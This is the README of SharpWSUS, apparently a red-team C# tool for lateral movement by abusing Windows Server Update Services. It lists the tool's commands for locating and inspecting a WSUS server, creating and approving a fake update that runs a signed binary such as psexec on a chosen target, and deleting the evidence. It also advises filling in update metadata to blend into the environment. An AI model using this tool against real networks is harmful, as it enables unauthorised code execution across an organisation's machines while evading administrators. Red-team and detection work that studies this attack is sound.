SharpWSUS is a CSharp tool for lateral movement through WSUS. There is a corresponding blog (https://labs.nettitude.com/blog/introducing-sharpwsus/) which has more detailed information about the tooling, use case and detection.
Massive credit to the below resources that really did 90% of this for me. This tool is just an enhancement of the below for C2 reliability and flexibility.
- https://github.com/AlsidOfficial/WSUSpendu - powershell tool for abusing WSUS
- https://github.com/ThunderGunExpress/Thunder_Woosus - Csharp tool for abusing WSUS
____ _ __ ______ _ _ ____/ ___|| |__ __ _ _ __ _ _\ \ / / ___|| | | / ___|\___ \| '_ \ / _` | '__| '_ \ \ /\ / /\___ \| | | \___ \ ___) | | | | (_| | | | |_) \ V V / ___) | |_| |___) ||____/|_| |_|\__,_|_| | .__/ \_/\_/ |____/ \___/|____/ |_| Phil Keeble @ Nettitude Red TeamCommands listed below have optional parameters in <>.Locate the WSUS server: SharpWSUS.exe locateInspect the WSUS server, enumerating clients, servers and existing groups: SharpWSUS.exe inspectCreate an update (NOTE: The payload has to be a windows signed binary): SharpWSUS.exe create /payload:[File location] /args:[Args for payload] </title:[Update title] /date:[YYYY-MM-DD] /kb:[KB on update] /rating:[Rating of update] /msrc:[MS RC] /description:[description] /url:[url]>Approve an update: SharpWSUS.exe approve /updateid:[UpdateGUID] /computername:[Computer to target] </groupname:[Group for computer to be added too] /approver:[Name of approver]>Check status of an update: SharpWSUS.exe check /updateid:[UpdateGUID] /computername:[Target FQDN]Delete update and clean up groups added: SharpWSUS.exe delete /updateid:[UpdateGUID] /computername:[Target FQDN] </groupname:[GroupName] /keepgroup>
- Binary has to be windows signed, so psexec, msiexec, msbuild etc could be useful for lateral movement.
- The metadata on the create command is not needed, but is useful for blending in to the environment.
- If testing in a lab the first is usually quick, then each subsequent update will take a couple hours (this is due to how windows evaluates whether an update is installed already or not)